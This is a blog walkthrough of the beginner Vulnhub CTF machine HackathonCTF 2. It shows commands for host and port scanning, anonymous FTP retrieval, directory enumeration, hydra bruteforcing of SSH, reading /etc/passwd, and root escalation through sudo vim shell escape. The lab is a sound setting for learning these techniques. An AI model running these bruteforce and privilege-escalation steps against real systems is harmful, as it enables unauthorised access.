HackathonCTF 2 Walkthrough – Vulnhub – Writeup

There is a new beginner level CTF challenge in Vulnhub. The author of the machine is Somu Sen. Also, I am trying the machine on the VMWare Workstation Player. “HackathonCTF 2 Walkthrough – Vulnhub – Writeup”.

Link to the machine: https://www.vulnhub.com/entry/hackathonctf-2,714/

Walkthrough of another easy machine Hackable II

Identify the target

Firstly, I had to identify the IP address of the target machine.

fping -aqg 192.168.19.0/24

Scan open ports

Next, I scanned the open ports to know the exposed services.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141

Firstly, anonymous ftp access is allowed. Then, it is evident from the scan results that there is a dictionary file which we can use to bruteforce different logins. In my mind, I am going to use the dictionary list to bruteforce the SSH service running at port 7223. So, I logged in to the FTP server.

ftp 192.168.19.141
ls -al 
get flag1.txt
get word.dir
cat flag1.txt

Now that I have the wordlist, I require the username to bruteforce. For this, I enumerated the webserver.

Enumerate web server

gobuster dir -u http://192.168.19.141 -x html,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log

During the scanning, I found a URL path /happy.

The URL said there was nothing in there. However, when I looked at the source, I found a username.

Now, I have username and wordlist. So, I can bruteforce now.

Bruteforce using hydra

Hydra is a tool that does online bruteforcing. On the other hand, there are offline password cracking tools as well like John the Ripper.

hydra -V -l hackathonll -P word.dir 192.168.19.141 ssh -s 7223

Finally, I got the credentials of the SSH login.

ssh hackathonll@192.168.19.141 -p 7223

However, this is not the user that had the flag. So, I looked up for the users in the machine.

cat /etc/passwd | grep bash

We can see that there is another user called dobash. Thus, I had to try to get his shell. But before that, you can see that the shell isn’t the bash shell. So, let’s switch to that.

bash

However, while searching for the next clue, I looked at my sudo permissions.

sudo -l

Luckily, we could use vim as root without requiring the password of root. If we look at GTFObins, we get to learn that vim allows execution of shell commands.

Reference: https://gtfobins.github.io/gtfobins/vim/

sudo vim -c ':!/bin/bash'

Finally, I got the root shell and the root flag.

cd /root/
ls
cat flag2.txt

Also, there is nothing in dobash. It was there to divert my mind.

Conclusion

This is a very beginner level machine. Hence, you can crack this within a few minutes.

5 1 vote
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments